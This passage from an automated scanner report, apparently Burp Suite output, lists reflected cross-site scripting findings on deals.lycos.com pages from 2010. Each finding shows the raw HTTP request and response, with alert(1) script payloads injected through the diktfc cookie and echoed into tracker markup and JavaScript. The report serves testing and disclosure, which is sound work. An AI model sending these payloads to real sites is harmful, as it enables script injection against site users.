Cookie: displayMobile=0; lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A2ec09"><script>alert(1)</script>ef66589da7f; __utmz=1.1292163874.1.2.utmcsr=lycoshome|utmccn=home_deals|utmcmd=right_module; __utma=1.1159493979.1292163871.1292163871.1292163871.1; PENTA=174.121.222.18.1292163893857460; __utmc=1; __utmb=1.6.10.1292163871; LycosDeals=urekhuop9o7e7tsuqpcq0rf2l2;

Response

HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 14:30:37 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM", policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:30:37 GMT; path=/
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 46896

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="Content-
...[SNIP]...
<img src="http://b.scorecardresearch.com/p?c1=2&amp;c2=6036445&amp;c3=&amp;c4=deals.lycos.com/deals/category/health-and-beauty-228&amp;c5=&amp;c6=&amp;c15=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A2ec09"><script>alert(1)</script>ef66589da7f&amp;cj=1" alt="tracker" />
...[SNIP]...

1.283. http://deals.lycos.com/deals/category/home-and-garden-196 [diktfc cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://deals.lycos.com
Path:   /deals/category/home-and-garden-196

Issue detail

The value of the diktfc cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 7178c"%3balert(1)//f479da64e2a was submitted in the diktfc cookie. This input was echoed as 7178c";alert(1)//f479da64e2a in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /deals/category/home-and-garden-196 HTTP/1.1
Host: deals.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A7178c"%3balert(1)//f479da64e2a; __utmz=1.1292163874.1.2.utmcsr=lycoshome|utmccn=home_deals|utmcmd=right_module; __utma=1.1159493979.1292163871.1292163871.1292163871.1; PENTA=174.121.222.18.1292163893857460; __utmc=1; __utmb=1.6.10.1292163871; LycosDeals=urekhuop9o7e7tsuqpcq0rf2l2;

Response

HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 14:29:58 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM", policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:29:58 GMT; path=/
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 48074

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="Content-
...[SNIP]...
ype="text/javascript">
COMSCORE.beacon({
c1:2,
c2:6036445,
c3:"",
c4:"deals.lycos.com/deals/category/home-and-garden-196",
c5:"",
c6:"",
c15:"013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A7178c";alert(1)//f479da64e2a"
});
</script>
...[SNIP]...

1.284. http://deals.lycos.com/deals/category/home-and-garden-196 [diktfc cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://deals.lycos.com
Path:   /deals/category/home-and-garden-196

Issue detail

The value of the diktfc cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 574bb"><script>alert(1)</script>eefe4285fdf was submitted in the diktfc cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /deals/category/home-and-garden-196 HTTP/1.1
Host: deals.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A574bb"><script>alert(1)</script>eefe4285fdf; __utmz=1.1292163874.1.2.utmcsr=lycoshome|utmccn=home_deals|utmcmd=right_module; __utma=1.1159493979.1292163871.1292163871.1292163871.1; PENTA=174.121.222.18.1292163893857460; __utmc=1; __utmb=1.6.10.1292163871; LycosDeals=urekhuop9o7e7tsuqpcq0rf2l2;

Response

HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 14:29:56 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM", policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:29:56 GMT; path=/
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 47791

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="Content-
...[SNIP]...
<img src="http://b.scorecardresearch.com/p?c1=2&amp;c2=6036445&amp;c3=&amp;c4=deals.lycos.com/deals/category/home-and-garden-196&amp;c5=&amp;c6=&amp;c15=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A574bb"><script>alert(1)</script>eefe4285fdf&amp;cj=1" alt="tracker" />
...[SNIP]...

1.285. http://deals.lycos.com/deals/category/lcd-tvs-424 [diktfc cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://deals.lycos.com
Path:   /deals/category/lcd-tvs-424

Issue detail

The value of the diktfc cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ca710"><script>alert(1)</script>8995098f657 was submitted in the diktfc cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /deals/category/lcd-tvs-424 HTTP/1.1
Host: deals.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9Aca710"><script>alert(1)</script>8995098f657; __utmz=1.1292163874.1.2.utmcsr=lycoshome|utmccn=home_deals|utmcmd=right_module; __utma=1.1159493979.1292163871.1292163871.1292163871.1; PENTA=174.121.222.18.1292163893857460; __utmc=1; __utmb=1.6.10.1292163871; LycosDeals=urekhuop9o7e7tsuqpcq0rf2l2;

Response

HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 14:29:56 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM", policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:29:56 GMT; path=/
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 48961

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="Content-
...[SNIP]...
<img src="http://b.scorecardresearch.com/p?c1=2&amp;c2=6036445&amp;c3=&amp;c4=deals.lycos.com/deals/category/lcd-tvs-424&amp;c5=&amp;c6=&amp;c15=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9Aca710"><script>alert(1)</script>8995098f657&amp;cj=1" alt="tracker" />
...[SNIP]...

1.286. http://deals.lycos.com/deals/category/lcd-tvs-424 [diktfc cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://deals.lycos.com
Path:   /deals/category/lcd-tvs-424

Issue detail

The value of the diktfc cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 8c8b4"%3balert(1)//c21369f207e was submitted in the diktfc cookie. This input was echoed as 8c8b4";alert(1)//c21369f207e in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /deals/category/lcd-tvs-424 HTTP/1.1
Host: deals.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A8c8b4"%3balert(1)//c21369f207e; __utmz=1.1292163874.1.2.utmcsr=lycoshome|utmccn=home_deals|utmcmd=right_module; __utma=1.1159493979.1292163871.1292163871.1292163871.1; PENTA=174.121.222.18.1292163893857460; __utmc=1; __utmb=1.6.10.1292163871; LycosDeals=urekhuop9o7e7tsuqpcq0rf2l2;

Response

HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 14:29:57 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM", policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:29:58 GMT; path=/
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 48931

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="Content-
...[SNIP]...
script type="text/javascript">
COMSCORE.beacon({
c1:2,
c2:6036445,
c3:"",
c4:"deals.lycos.com/deals/category/lcd-tvs-424",
c5:"",
c6:"",
c15:"013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A8c8b4";alert(1)//c21369f207e"
});
</script>
...[SNIP]...

1.287. http://deals.lycos.com/deals/category/movies-music-books-178 [diktfc cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://deals.lycos.com
Path:   /deals/category/movies-music-books-178

Issue detail

The value of the diktfc cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c87eb"><script>alert(1)</script>48578ff097f was submitted in the diktfc cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /deals/category/movies-music-books-178 HTTP/1.1
Host: deals.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9Ac87eb"><script>alert(1)</script>48578ff097f; __utmz=1.1292163874.1.2.utmcsr=lycoshome|utmccn=home_deals|utmcmd=right_module; __utma=1.1159493979.1292163871.1292163871.1292163871.1; PENTA=174.121.222.18.1292163893857460; __utmc=1; __utmb=1.6.10.1292163871; LycosDeals=urekhuop9o7e7tsuqpcq0rf2l2;

Response

HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 14:30:40 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM", policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:30:40 GMT; path=/
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 46302

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="Content-
...[SNIP]...
<img src="http://b.scorecardresearch.com/p?c1=2&amp;c2=6036445&amp;c3=&amp;c4=deals.lycos.com/deals/category/movies-music-books-178&amp;c5=&amp;c6=&amp;c15=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9Ac87eb"><script>alert(1)</script>48578ff097f&amp;cj=1" alt="tracker" />
...[SNIP]...

1.288. http://deals.lycos.com/deals/category/movies-music-books-178 [diktfc cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://deals.lycos.com
Path:   /deals/category/movies-music-books-178

Issue detail

The value of the diktfc cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 40639"%3balert(1)//4ac5d608389 was submitted in the diktfc cookie. This input was echoed as 40639";alert(1)//4ac5d608389 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /deals/category/movies-music-books-178 HTTP/1.1
Host: deals.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A40639"%3balert(1)//4ac5d608389; __utmz=1.1292163874.1.2.utmcsr=lycoshome|utmccn=home_deals|utmcmd=right_module; __utma=1.1159493979.1292163871.1292163871.1292163871.1; PENTA=174.121.222.18.1292163893857460; __utmc=1; __utmb=1.6.10.1292163871; LycosDeals=urekhuop9o7e7tsuqpcq0rf2l2;

Response

HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 14:30:42 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM", policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:30:42 GMT; path=/
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 46132

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="Content-
...[SNIP]...
="text/javascript">
COMSCORE.beacon({
c1:2,
c2:6036445,
c3:"",
c4:"deals.lycos.com/deals/category/movies-music-books-178",
c5:"",
c6:"",
c15:"013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A40639";alert(1)//4ac5d608389"
});
</script>
...[SNIP]...

1.289. http://deals.lycos.com/deals/category/mp3-players-144 [diktfc cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://deals.lycos.com
Path:   /deals/category/mp3-players-144

Issue detail

The value of the diktfc cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 18ae8"><script>alert(1)</script>c9b7635a3ff was submitted in the diktfc cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /deals/category/mp3-players-144 HTTP/1.1
Host: deals.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A18ae8"><script>alert(1)</script>c9b7635a3ff; __utmz=1.1292163874.1.2.utmcsr=lycoshome|utmccn=home_deals|utmcmd=right_module; __utma=1.1159493979.1292163871.1292163871.1292163871.1; PENTA=174.121.222.18.1292163893857460; __utmc=1; __utmb=1.6.10.1292163871; LycosDeals=urekhuop9o7e7tsuqpcq0rf2l2;

Response

HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 14:29:55 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM", policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:29:55 GMT; path=/
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 48368

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="Content-
...[SNIP]...
<img src="http://b.scorecardresearch.com/p?c1=2&amp;c2=6036445&amp;c3=&amp;c4=deals.lycos.com/deals/category/mp3-players-144&amp;c5=&amp;c6=&amp;c15=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A18ae8"><script>alert(1)</script>c9b7635a3ff&amp;cj=1" alt="tracker" />
...[SNIP]...

1.290. http://deals.lycos.com/deals/category/mp3-players-144 [diktfc cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://deals.lycos.com
Path:   /deals/category/mp3-players-144

Issue detail

The value of the diktfc cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d7bdd"%3balert(1)//aecc2087a85 was submitted in the diktfc cookie. This input was echoed as d7bdd";alert(1)//aecc2087a85 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /deals/category/mp3-players-144 HTTP/1.1
Host: deals.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9Ad7bdd"%3balert(1)//aecc2087a85; __utmz=1.1292163874.1.2.utmcsr=lycoshome|utmccn=home_deals|utmcmd=right_module; __utma=1.1159493979.1292163871.1292163871.1292163871.1; PENTA=174.121.222.18.1292163893857460; __utmc=1; __utmb=1.6.10.1292163871; LycosDeals=urekhuop9o7e7tsuqpcq0rf2l2;

Response

HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 14:29:56 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM", policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:29:57 GMT; path=/
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 48339

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="Content-
...[SNIP]...
pt type="text/javascript">
COMSCORE.beacon({
c1:2,
c2:6036445,
c3:"",
c4:"deals.lycos.com/deals/category/mp3-players-144",
c5:"",
c6:"",
c15:"013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9Ad7bdd";alert(1)//aecc2087a85"
});
</script>
...[SNIP]...

1.291. http://deals.lycos.com/deals/category/office-and-supplies-182 [diktfc cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://deals.lycos.com
Path:   /deals/category/office-and-supplies-182

Issue detail

The value of the diktfc cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 52c09"%3balert(1)//5dd4415da8d was submitted in the diktfc cookie. This input was echoed as 52c09";alert(1)//5dd4415da8d in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /deals/category/office-and-supplies-182 HTTP/1.1
Host: deals.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A52c09"%3balert(1)//5dd4415da8d; __utmz=1.1292163874.1.2.utmcsr=lycoshome|utmccn=home_deals|utmcmd=right_module; __utma=1.1159493979.1292163871.1292163871.1292163871.1; PENTA=174.121.222.18.1292163893857460; __utmc=1; __utmb=1.6.10.1292163871; LycosDeals=urekhuop9o7e7tsuqpcq0rf2l2;

Response

HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 14:30:42 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM", policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:30:42 GMT; path=/
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 47344

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="Content-
...[SNIP]...
"text/javascript">
COMSCORE.beacon({
c1:2,
c2:6036445,
c3:"",
c4:"deals.lycos.com/deals/category/office-and-supplies-182",
c5:"",
c6:"",
c15:"013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A52c09";alert(1)//5dd4415da8d"
});
</script>
...[SNIP]...

1.292. http://deals.lycos.com/deals/category/office-and-supplies-182 [diktfc cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://deals.lycos.com
Path:   /deals/category/office-and-supplies-182

Issue detail

The value of the diktfc cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9d7f4"><script>alert(1)</script>9d30591a5a6 was submitted in the diktfc cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /deals/category/office-and-supplies-182 HTTP/1.1
Host: deals.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A9d7f4"><script>alert(1)</script>9d30591a5a6; __utmz=1.1292163874.1.2.utmcsr=lycoshome|utmccn=home_deals|utmcmd=right_module; __utma=1.1159493979.1292163871.1292163871.1292163871.1; PENTA=174.121.222.18.1292163893857460; __utmc=1; __utmb=1.6.10.1292163871; LycosDeals=urekhuop9o7e7tsuqpcq0rf2l2;

Response

HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 14:30:40 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM", policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:30:40 GMT; path=/
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 47353

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="Content-
...[SNIP]...
<img src="http://b.scorecardresearch.com/p?c1=2&amp;c2=6036445&amp;c3=&amp;c4=deals.lycos.com/deals/category/office-and-supplies-182&amp;c5=&amp;c6=&amp;c15=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A9d7f4"><script>alert(1)</script>9d30591a5a6&amp;cj=1" alt="tracker" />
...[SNIP]...

1.293. http://deals.lycos.com/deals/category/pc-computers-47 [diktfc cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://deals.lycos.com
Path:   /deals/category/pc-computers-47

Issue detail

The value of the diktfc cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 97fa0"><script>alert(1)</script>22b63eeca5d was submitted in the diktfc cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /deals/category/pc-computers-47 HTTP/1.1
Host: deals.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A97fa0"><script>alert(1)</script>22b63eeca5d; __utmz=1.1292163874.1.2.utmcsr=lycoshome|utmccn=home_deals|utmcmd=right_module; __utma=1.1159493979.1292163871.1292163871.1292163871.1; PENTA=174.121.222.18.1292163893857460; __utmc=1; __utmb=1.6.10.1292163871; LycosDeals=urekhuop9o7e7tsuqpcq0rf2l2;

Response

HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 14:29:51 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
